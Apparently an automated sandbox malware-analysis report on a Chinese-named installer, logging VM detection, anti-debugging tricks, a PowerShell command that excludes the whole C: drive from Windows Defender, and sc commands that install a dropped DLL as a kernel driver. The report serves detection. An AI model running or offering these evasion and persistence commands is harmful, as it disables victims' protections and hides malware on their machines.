Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6565Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3241Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpWindow / User API: threadDelayed 591Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpWindow / User API: threadDelayed 609Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpWindow / User API: threadDelayed 561Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3SJ46.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-GHUQ4.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-GHUQ4.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3SJ46.tmp\update.vacJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeAPI coverage: 7.7 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7504Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C90B430 FindFirstFileA,FindClose,11_2_6C90B430
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A76868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,17_2_00A76868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A77496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,17_2_00A77496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A79C60 GetSystemInfo,17_2_00A79C60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: svchost.exe, 00000001.00000002.1610362591.0000016102642000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000001.00000002.1611745576.000001610267B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 00000006.00000002.1392732103.000000000144F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: svchost.exe, 00000001.00000002.1609497882.0000016102602000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: svchost.exe, 00000001.00000002.1610886823.0000016102653000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000e1}
Source: svchost.exe, 00000001.00000002.1610362591.000001610262B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: svchost.exe, 00000001.00000002.1611745576.000001610266E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000001.00000002.1610362591.000001610262B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000001.00000002.1611745576.000001610266E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:P
Source: svchost.exe, 00000001.00000002.1610362591.0000016102642000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000009.00000002.1605599206.000002A4FBA31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Contains functionality to hide a thread from the debugger
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C793886 NtSetInformationThread 00000000,00000011,00000000,0000000011_2_6C793886
Hides threads from debuggers
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9206F1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_6C9206F1
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00AF57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,17_2_00AF57D0
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C91F6ED mov eax, dword ptr fs:[00000030h]11_2_6C91F6ED
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C92A2A5 mov eax, dword ptr fs:[00000030h]11_2_6C92A2A5
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C92A2D6 mov eax, dword ptr fs:[00000030h]11_2_6C92A2D6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9206F1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_6C9206F1
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C91922D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_6C91922D

HIPS / PFW / Operating System Protection Evasion

barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Found driver which could be used to inject code into processes
Source: tProtect.dll.19.drStatic PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
